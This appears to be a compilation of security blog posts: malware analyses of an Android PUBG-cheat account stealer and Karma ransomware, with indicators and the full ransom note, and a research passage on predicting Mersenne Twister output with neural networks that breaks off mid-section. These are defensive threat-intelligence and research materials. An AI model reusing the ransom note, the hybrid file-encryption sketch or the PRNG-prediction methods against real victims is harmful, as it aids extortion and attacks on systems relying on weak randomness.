
Social Network Account Stealers Hidden in Android Gaming Hacking Tool

19 October 2021 at 13:02

Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered new malware that specifically steals Google, Facebook, Twitter, Telegram, and PUBG game accounts. This malware hides in a game assistant tool called “DesiEsp,” an assistant tool for the PUBG game available on GitHub. Essentially, cybercriminals added their own malicious code on top of the open-source DesiEsp tool and published it on Telegram. PUBG players are the main targets of this Android malware in all regions around the world, but most infections are reported from the United States, India, and Saudi Arabia.

What is an ESP hack? 

ESP hacks (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (health points), name, rank, and gun. It is like a permanently tuned-up KDR/HP vision. ESP hacks are not a single hack but a whole category of hacks that function similarly and are often used together to make them more effective.

How can you be affected by this malware? 

After investigation, it was found that this malware is spread in channels related to the PUBG game on the Telegram platform. Fortunately, this malware has not been found on Google Play.

Figure 1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior 

After it runs, this malware asks the user to grant superuser permission:

Figure 2. Initial malware requesting root access

If the user denies the superuser request, the malware warns that the application may not work:

Figure 3. Error message when root access is not provided

When it gains root permission, it starts two malicious actions. First, it steals accounts by accessing the system account database and application databases.

Figure 4. Getting a Google account from the Android system account database

Second, it installs an additional payload with the package name “com.android.google.gsf.policy_sidecar_aps” using the “pm install” command. The payload package sits in the assets folder, disguised with a file name ending in “*.crt” or “*.mph”.

Figure 5. Payload disguised as a certificate file (crt extension)

Stealing social and gaming accounts 

The dropped payload does not display an icon and does not operate directly on the screen of the user’s device. In the apps list of the system settings, it usually disguises its package name as something like “com.google.android.gsf” to make users think it is a Google system service. It runs in the background as an accessibility service. Accessibility Service is an auxiliary function provided by the Android system to help people with physical disabilities use mobile apps. It connects to other apps like a plug-in and can access the Activity, View, and other resources of the connected app.

The malware first tries to get root permission and the IMEI (International Mobile Equipment Identity) code, which it later uses when accessing the system account database. Even without root access, it still has other ways to steal account information. Finally, it also tries to activate device administrator privileges to make its removal more difficult.

Methods to steal account information 

The first method this malware uses to steal account credentials is to monitor the login window and account input box text of the targeted app through the AccessibilityService interface. The target apps include Facebook (com.facebook.katana), Twitter (com.twitter.android), Google (com.google.android.gms), and the PUBG MOBILE game (com.tencent.ig).

The second method is to steal account information (including account number, password, key, and token) by accessing the system account database, the user config file, and the database of the monitored app. This part of the malicious code is the same as in the parent sample above:

Figure 6. Malware accessing Facebook account information using root privileges

Finally, the malware reports the stolen account information to the attacker’s server via HTTP.

Gaming users infected worldwide 

PUBG is popular all over the world, and users of PUBG assistant tools exist in every region. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including the United States, India, and Saudi Arabia:

Figure 7. Top affected countries include USA, India, and Saudi Arabia

Conclusion 

The online game market is being revitalized, as exemplified by e-sports. We can play games anywhere, in various environments such as mobiles, tablets, and PCs. Some users look for cheat tools and hacking techniques to gain a slight advantage in the game. Cheat tools are, by their nature, inevitably hosted on suspicious websites, and users looking for them must venture onto those sites. Attackers are aware of the desires of such users and use cheat tools as a lure to attack them.

This malware is still constantly producing variants that use several techniques to evade detection by anti-virus software, including packing, code obfuscation, and string encryption, allowing it to infect more game users.

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware. Use security software on your device. Game users should think twice before downloading and installing cheat tools, especially when they request superuser or accessibility service permissions.

Indicators of Compromise 

Dropper samples 

36d9e580c02a196e017410a6763f342eea745463cefd6f4f82317aeff2b7e1a5

fac1048fc80e88ff576ee829c2b05ff3420d6435280e0d6839f4e957c3fa3679

d054364014188016cf1fa8d4680f5c531e229c11acac04613769aa4384e2174b

3378e2dbbf3346e547dce4c043ee53dc956a3c07e895452f7e757445968e12ef

7e0ee9fdcad23051f048c0d0b57b661d58b59313f62c568aa472e70f68801417

6b14f00f258487851580e18704b5036e9d773358e75d01932ea9f63eb3d93973

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

ff186c0272202954def9989048e1956f6ade88eb76d0dc32a103f00ebfd8538e

3726dc9b457233f195f6ec677d8bc83531e8bc4a7976c5f7bb9b2cfdf597e86c

e815b1da7052669a7a82f50fabdeaece2b73dd7043e78d9850c0c7e95cc0013d

Payload samples 

8ef54eb7e1e81b7c5d1844f9e4c1ba8baf697c9f17f50bfa5bcc608382d43778

4e08e407c69ee472e9733bf908c438dbdaebc22895b70d33d55c4062fc018e26

6e7c48909b49c872a990b9a3a1d5235d81da7894bd21bc18caf791c3cb571b1c

9099908a1a45640555e70d4088ea95e81d72184bdaf6508266d0a83914cc2f06

ca29a2236370ed9979dc325ea4567a8b97b0ff98f7f56ea2e82a346182dfa3b8

d2985d3e613984b9b1cba038c6852810524d11dddab646a52bf7a0f6444a9845

ef69d1b0a4065a7d2cc050020b349f4ca03d3d365a47be70646fd3b6f9452bf6

06984d4249e3e6b82bfbd7da260251d99e9b5e6d293ecdc32fe47dd1cd840654

Domain 

hosting-b5476[.]gq 


Vulnerability Spotlight: Multiple vulnerabilities in ZTE MF971R LTE router

18 October 2021 at 19:04
Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.  Cisco Talos recently discovered multiple vulnerabilities in the ZTE MF971R LTE portable router.  The MF971R is a portable router with Wi-Fi support and works as an LTE/GSM modem. An attacker could...


Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

18 October 2021 at 16:43

Karma is a relatively new ransomware threat actor, having first been observed in June of 2021. The group has targeted numerous organizations across different industries. Reports of a group with the same name from 2016 are not related to the actors currently using the name. An initial technical analysis of a single sample related to Karma was published by researchers from Cyble in August.

In this post, we take a deeper dive, focusing on the evolution of Karma through multiple versions of the malware appearing through June 2021. In addition, we explore the links between Karma and other well known malware families such as NEMTY and JSWorm and offer an expanded list of technical indicators for threat hunters and defenders.

Initial Sample Analysis

Karma’s development has been fairly rapid and regular, with updated variants and improvements appearing often, sometimes with multiple versions built on the same day. The first few Karma samples our team observed were:

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f

Sample 1 was compiled on June 18th, 2021, and Samples 2 and 3 the following day, on the 19th, a few minutes apart. The basic configuration of these samples is similar, though there are some slight differences, such as the PDB paths.

After Sample 1, we see more of the core features appear, including the writing of the ransom note. Upon execution, these payloads enumerate all local drives (A to Z) and encrypt files where possible.

Further hunting revealed a number of other related samples, all compiled within a few days of each other. The following table illustrates compilation timestamps and payload size across versions of Karma compiled in a single week. Note how the payload size decreases as the authors iterate.

Ransom note is not created in Sample 1.

Also, the list of excluded extensions is somewhat larger in Sample 1 than in both Samples 2 and 3, and the list of extensions is further reduced from Sample 5 onwards to only exclude “.exe”, “.ini”, “.dll”, “.url” and “.lnk”.

The list of excluded extensions is reduced as the malware authors iterate

Encryption Details

From Sample 2 onwards, the malware calls CreateIoCompletionPort, which is used for communication between the main thread and the sub-thread(s) handling the encryption process. This specific call is key to managing the efficiency of the encryption process (parallelization, in this case).

Individual files are encrypted with a random ChaCha20 key. Once a file is encrypted, the malware encrypts the random ChaCha20 key with the public ECC key and embeds it in the encrypted file.

ChaCha encryption
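
The report does not spell out Karma's exact key-wrapping construction, but the pattern described (a random per-file ChaCha20 key, wrapped with an embedded ECC public key) is a standard hybrid scheme. A generic Python sketch, purely illustrative and not Karma's code, using ephemeral ECDH over secp256k1 with an HKDF-derived wrapping key:

import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def hybrid_encrypt(data: bytes, recipient_pub: ec.EllipticCurvePublicKey) -> bytes:
    file_key = os.urandom(32)  # random per-file ChaCha20 key
    nonce = os.urandom(16)
    enc = Cipher(algorithms.ChaCha20(file_key, nonce), mode=None).encryptor()
    ct = enc.update(data)

    # wrap the file key: ephemeral ECDH + HKDF, then a toy XOR wrap for clarity
    eph = ec.generate_private_key(ec.SECP256K1())
    shared = eph.exchange(ec.ECDH(), recipient_pub)
    wrap = HKDF(hashes.SHA256(), 32, None, b"file-key-wrap").derive(shared)
    wrapped_key = bytes(a ^ b for a, b in zip(file_key, wrap))

    eph_pub = eph.public_key().public_bytes(
        serialization.Encoding.X962, serialization.PublicFormat.CompressedPoint)
    # embed everything the private-key holder needs alongside the ciphertext
    return nonce + eph_pub + wrapped_key + ct

Only the holder of the matching private key can recompute the shared secret and unwrap the per-file key, which matches the behavior described above.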

Across Samples 2 to 5, the author removed the CreateIoCompletionPort call, instead opting to create a new thread to manage enumeration and encryption per drive. We also note the “KARMA” mutex, created to prevent the malware from running more than once. The ransom note name has also been updated to “KARMA-ENCRYPTED.txt”.

Diving in deeper, some samples show that the ChaCha20 algorithm has been swapped out for Salsa20, and the asymmetric ECC algorithm has been swapped from the Secp256k1 curve to Sect233r1. Some updates around execution began to appear during this time as well, such as support for command-line parameters.

A few changes were noted in Samples 6 and 7. The main difference is the newly included background image: the file “background.jpg” is written to %TEMP% and set as the desktop wallpaper for the logged-in user.

Desktop image change and message

Malware Similarity Analysis

From our analysis, we see similarities between JSWorm and the associated permutations of that ransomware family such as NEMTY, Nefilim, and GangBang. Specifically, the Karma code analyzed bears close similarity to the GangBang or Milihpen variants that appeared around January 2021.

Some high-level similarities are visible in the configurations.

We can see deeper relationships when we conduct a bindiff on Karma and GangBang samples. The following image shows how similar the main() functions are:

The main() function & argument processing in Gangbang (left) and Karma

Victim Communication

The main body of the ransom note text hasn’t changed since the first sample and still contains mistakes. The ransom notes are base64-encoded in the binary and dropped on the victim machine with the filename “KARMA-AGREE.txt” or, in later samples, “KARMA-ENCRYPTED.txt”.

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.
If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:

{[email protected]}
{[email protected]}
{[email protected]}

Each sample observed offers three contact emails, one for each of the mail providers onionmail, tutanota, and protonmail. In each sample, the contact emails are unique, suggesting they are specific communication channels per victim. The notes contain no other unique ID or victim identifier as sometimes seen in notes used by other ransomware groups.

In common with other operators, however, the Karma ransom demand threatens to leak victim data if the victim does not pay. The address of a common leaks site where the data will be published is also given in the note. This website page appears to have been authored in May 2021 using WordPress.

The Karma Ransomware Group’s Onion Page

Conclusion

Karma is a young and hungry ransomware operation. They are aggressive in their targeting, and show no reluctance in following through with their threats. The apparent similarities to the JSWorm family are also highly notable as it could be an indicator of the group being more than they appear. The rapid iteration over recent months suggests the actor is investing in development and aims to be around for the foreseeable future. SentinelLabs continues to follow and analyze the development of Karma ransomware.

Indicators of Compromise

SHA1s
Karma Ransomware

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f
Sample 4: c4cd4da94a2a1130c0b9b1bf05552e06312fbd14
Sample 5: bb088c5bcd5001554d28442bbdb144b90b163cc5
Sample 6: 5ff1cd5b07e6c78ed7311b9c43ffaa589208c60b
Sample 7: 08f1ef785d59b4822811efbc06a94df16b72fea3
Sample 8: b396affd40f38c5be6ec2fc18550bbfc913fc7ea

Gangbang Sample 
ac091ce1281a16f9d7766a7853108c612f058c09

Karma Desktop image
%TEMP%/background.jpg
7b8c45769981344668ce09d48ace78fae50d71bc

Victim Blog (TOR)
http[:]//3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd[.]onion/

Ransom Note Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

MITRE ATT&CK
T1485 Data Destruction
T1486 Data Encrypted for Impact
T1012 Query Registry
T1082 System Information Discovery
T1120 Peripheral Device Discovery
T1204 User Execution
T1204.002 User Execution: Malicious File

Is Using Public WiFi Safe?

18 October 2021 at 13:30

Using public WiFi can leave you and your employees open to man-in-the-middle cyber attacks. With the increase of remote work, organizations must teach their employees how to stay safe on open WiFi networks. Get our tips on how to protect against hackers while on open WiFi networks.


Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

18 October 2021 at 13:00


1. Introduction

In part 1 of this post, we showed how to train a Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

The same concept applies to a more complex, structured PRNG, namely the Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still not cryptographically secure) PRNG [1]. It generates 32-bit words with a statistically uniform distribution and has a very long period (2^19937 − 1 for the most common variant). There are many variants of the MT PRNG that follow the same algorithm but differ in the constants and configuration. The most commonly used variant is MT19937; hence, for the rest of this article, we will focus on it.

To crack the MT algorithm, we first need to examine how it works; we do this in the next section.

** Editor’s Note: How does this relate to security? While both the research in this blog post (and that of Part 1 in this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

2. How does MT19937 PRNG work?

MT can be considered a twisted form of the generalized linear-feedback shift register (LFSR). The idea of an LFSR is to use a linear function, such as XOR, with the old register value to get the register’s new value. In MT, the internal state is saved as a sequence of 32-bit words. The size of the internal state differs based on the MT variant; in the case of MT19937 it is 624. The pseudocode of MT is listed below, as shared on Wikipedia.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
            // Alternatively, seed with constant value; 5489 is used in reference C code
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and a linear XOR function. This function is straightforward, but we will not go in depth into its implementation, as it is irrelevant to our goal. The two main functions we have are extract_number and twist. The extract_number function is called every time we want to generate a new random value. It starts by checking whether the state is initialized; if not, it either initializes it by calling seed_mt with a constant seed or returns an error. Then the first step is to call the twist function to twist the internal state, as we will describe later. This twist is also called again every 624 calls to the extract_number function. After that, the code uses the number at the current index (which starts at 0 and goes up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value.

The twist function changes the internal states to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants of the algorithm that may change from one variant to another. The values of these constants for MT19937 are as follows (a compact Python port using them is sketched after the list):

  • (w, n, m, r) = (32, 624, 397, 31)
  • a = 0x9908B0DF
  • (u, d) = (11, 0xFFFFFFFF)
  • (s, b) = (7, 0x9D2C5680)
  • (t, c) = (15, 0xEFC60000)
  • l = 18
  • f = 1812433253
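
For concreteness, here is a compact Python port of the pseudocode above with the MT19937 constants filled in. This is a reference sketch for the rest of this article, not the optimized library implementation:

class MT19937:
    n, m = 624, 397
    lower_mask = 0x7FFFFFFF        # (1 << r) - 1, with r = 31
    upper_mask = 0x80000000        # lowest w bits of ~lower_mask

    def __init__(self, seed):
        # seed_mt: initialize the 624-word state from the seed
        self.mt = [0] * self.n
        self.index = self.n
        self.mt[0] = seed
        for i in range(1, self.n):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF

    def twist(self):
        # regenerate the whole state in place, once every 624 extractions
        for i in range(self.n):
            x = (self.mt[i] & self.upper_mask) + (self.mt[(i + 1) % self.n] & self.lower_mask)
            xA = x >> 1
            if x & 1:
                xA ^= 0x9908B0DF   # the constant a
            self.mt[i] = self.mt[(i + self.m) % self.n] ^ xA
        self.index = 0

    def extract_number(self):
        if self.index >= self.n:
            self.twist()
        y = self.mt[self.index]
        y ^= (y >> 11) & 0xFFFFFFFF  # (u, d)
        y ^= (y << 7) & 0x9D2C5680   # (s, b)
        y ^= (y << 15) & 0xEFC60000  # (t, c)
        y ^= y >> 18                 # l
        self.index += 1
        return y & 0xFFFFFFFF

As a sanity check, seeding this sketch with the reference default of 5489 should make its 10,000th output equal 4123659995, the check value the C++11 standard specifies for std::mt19937.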

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps: twisting and tempering. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new one. The tempering step happens with each number generated, converting one of the 624 states into a random number. Hence, we plan to use two NN models to learn each step separately. We will then use the two models together to reverse the whole PRNG: the reverse tempering model gets from a generated number to its internal state, and the twisting model produces the new state. Then, we can temper the generated state to get to the expected new PRNG number.

3.1 Using NN for State Twisting

After checking the twist function in the code listing above, we can see that the new state at position i depends on the variable xA and the old state value at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and the constant a. And the value of the variable x depends on the old state’s values at positions i and i + 1.

Hence, without getting into the details, we can deduce that each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f, hence effectively replicating the twisting step. To accomplish this, we created a modified generator that outputs the raw internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We generated a sequence of 5,000,000 32-bit state words. We then formatted these states into three 32-bit inputs and one 32-bit output. This creates a dataset of around five million records (5,000,000 − 624). Then we split the data into training and testing sets, with only 100,000 records for the test set; the rest of the data is used for training.
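
A sketch of how such a dataset can be assembled (the helper names and bit ordering here are ours, not from the original notebook; states is a long list of raw, untempered 32-bit state words):

import numpy as np

def to_bits(v):
    # 32-bit integer -> array of 32 bits (LSB first)
    return np.array([(v >> i) & 1 for i in range(32)], dtype=np.uint8)

def build_twist_dataset(states, n=624, m=397):
    X, Y = [], []
    for i in range(n, len(states)):
        x = np.concatenate([to_bits(states[i - n]),       # old state at i
                            to_bits(states[i - n + 1]),   # old state at i + 1
                            to_bits(states[i - n + m])])  # old state at i + m
        X.append(x)
        Y.append(to_bits(states[i]))                      # the new twisted state
    return np.array(X), np.array(Y)

# split: e.g. the last 100,000 records for testing, the rest for training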

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer, representing the three old states at the specific locations described in the previous equation (32 bits each), and 32 outputs in the output layer, representing the new 32-bit state. The main hyperparameters we need to decide are the number of neurons/nodes and hidden layers. We tested different model structures with different numbers of hidden layers and neurons in each layer. Then we used KerasTuner’s BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as the learning rate). We used a small subset of the training set for this optimization. We got multiple promising model structures and then used the smallest one that had the most promising result.

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights connecting the first 31 bits of the 96 input bits to the first hidden layer nodes are almost always close to zero. This implies that those bits have no effect on the output bits, and hence we can ignore them in our training. Checking this observation against the MT implementation, we noticed that the state at position i is bitwise ANDed with a bitmask called upper_mask which, when r is 31 as in MT19937, has a value of 1 in the MSB and 0 for the rest. So, we only need the MSB of the state at position i. Hence, we can train our NN with only 65-bit inputs instead of 96.

Hence, our neural network ended up with the following structure (the input layer is not shown):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of parameters of the output layer is 3,104 (96×32 weights + 32 biases), for a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is the summary of the model parameters:

Twisting Model
Model Type: Dense Network
#Layers: 2
#Neurons: 128 (Dense)
#Trainable Parameters: 9,440
Activation Functions: Hidden Layer: relu; Output Layer: sigmoid
Loss Function: binary_crossentropy
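
In Keras, a model matching this summary could be declared as follows (a sketch; the optimizer settings are our assumption, not taken from the original experiments):

from tensorflow import keras

model = keras.Sequential([
    keras.Input(shape=(65,)),                      # two full states + one MSB bit
    keras.layers.Dense(96, activation="relu"),     # 65*96 + 96 = 6,336 parameters
    keras.layers.Dense(32, activation="sigmoid"),  # 96*32 + 32 = 3,104 parameters
])
model.compile(optimizer="adam", loss="binary_crossentropy",
              metrics=["binary_accuracy"])
model.summary()  # 9,440 trainable parameters, matching the table above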

3.1.4 Model Results

After a few hours and some manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy for both the training and testing sets. To be more confident in this result, we generated a new sample of 1,000,000 states using a different seed than the one used to generate the previous data. We got the same 100% bitwise accuracy when we tested with this newly generated data.

This means that the model has learned the exact formula that relates each state to the three previous states. Hence, if we had access to the three internal states at those specific locations, we could predict the next state. But usually we can only access the old random numbers, not the internal states. So, we need a different model that can reverse a generated, tempered number to its equivalent internal state. We can then use that model to recover the inputs of the twisting model, produce the new state, and apply the normal tempering step to get the next output. But before we get to that, let’s do a model deep dive.

3.1.5 Model Deep Dive

This section deep dives into the model to understand more about what it has learned from the state-relations data and whether it matches our expectations.

3.1.5.1 Model First Layer Connections

As discussed in Section 2, each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65 bits as input. Now, we would like to examine whether all 65 input bits have the same effect on the 32 output bits. In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs in the input layer to the 96 hidden nodes of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, on the x-axis, to the 96 hidden nodes in the hidden layer:

We can notice that the second input bit, which corresponds to the second state’s LSB, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. This observation matches the if-condition in the code listed in Section 2 that checks the LSB: based on its value, the new state may be XORed with a constant value that dramatically affects it.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes, as all its weights are close to zero. This maps to the line in the twist function where the second state is ANDed with lower_mask (0x7FFFFFFF in MT19937), which neglects its MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see whether we can get to the logic closed form using the trained model. Of course, we could derive the closed form by building all the 65-bit input variations (2^65) and testing each input combination’s output, but this approach is tedious and requires lots of evaluations. Instead, we can test the effect of each input on each output separately. This can be done by using the training set and setting each input bit individually, one time at 0 and one time at 1, and seeing which bits in the output are affected. This shows which input bits affect each bit in the output. For example, when we checked the first input, which corresponds to the MSB of the first state, we found it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]

We can see that inputs 33 to 64, which correspond to the last state, affect bits 0 to 31 in the output. We can also see that inputs 2 to 31, which correspond to the second state from bit 1 to bit 30 (ignoring the LSB and MSB), affect bits 0 to 29 in the output. And as we know, we are using the XOR logic function in the state evaluation. We can formalize the closed form as follows (ignoring input bits 0 and 1 for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is close to the final result; we still need to add the effect of input bits 0 and 1. Input bit 0, which corresponds to the first state’s MSB, affects bit 30. Hence we can update the above closed form to:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1)

Lastly, input bit 1, which corresponds to the second state’s LSB, affects 15 bits in the output. As it feeds an XOR, if this bit is 0 it does not affect the output, but if it is 1 it flips all 15 listed bits (by XORing them). If we assemble these 15 bits into a hexadecimal value, we get 0x9908B0DF (which is the constant a in MT19937). We can then include this in the closed form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the AND is 0, and hence the multiplication results in 0. But if the LSB of the second state is 1, the AND gives 1, and the multiplication results in 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular state buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) >> 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)
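
A quick way to sanity-check this closed form is to compare it, index by index, against a direct port of the branchy twist pseudocode from Section 2 (a small sketch):

import random

n, m, a = 624, 397, 0x9908B0DF

def twist_step_reference(mt, i):
    # the branchy form from the pseudocode
    x = (mt[i] & 0x80000000) + (mt[(i + 1) % n] & 0x7FFFFFFF)
    xA = x >> 1
    if x & 1:
        xA ^= a
    return mt[(i + m) % n] ^ xA

def twist_step_closed_form(mt, i):
    # the derived branch-free formula
    return (mt[(i + m) % n]
            ^ ((mt[(i + 1) % n] & 0x7FFFFFFF) >> 1)
            ^ ((mt[i] & 0x80000000) >> 1)
            ^ ((mt[(i + 1) % n] & 1) * a))

state = [random.getrandbits(32) for _ in range(n)]
assert all(twist_step_reference(state, i) == twist_step_closed_form(state, i)
           for i in range(n))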

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model for this phase to reverse the state tempering performed in the extract_number function shown in Section 2. As we can see there, a series of XOR and shift operations is applied to the state at the current index to generate the random number. So, we updated the code to emit the state both before and after tempering, to be used as the inputs and outputs for the neural network.

3.2.1 Data Preparation

We generated a sequence of 5,000,000 32-bit state words and their tempered values. Then we used the tempered states as inputs and the original states as outputs. This creates a dataset of 5 million records. Then we split the data into training and testing sets, with only 100,000 records for the test set; the rest of the data is used for training.
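
For reference, the tempering transformation itself is small enough to restate (constants as listed in Section 2); the dataset simply pairs temper(state) as the input with state as the label:

def temper(y):
    # MT19937 tempering: raw state word -> output random number
    y ^= (y >> 11) & 0xFFFFFFFF
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & 0xFFFFFFFF

# sketch: 'states' is the raw state sequence, as in Section 3.1.1
pairs = [(temper(s), s) for s in states]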

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state values and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameters we need to decide are the number of neurons/nodes and hidden layers. We tested different model structures with different numbers of hidden layers and neurons in each layer, similar to what we did for the previous NN model. We again used the smallest model structure that had the most promising result. Hence, our neural network ended up with the following structure (the input layer is not shown):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

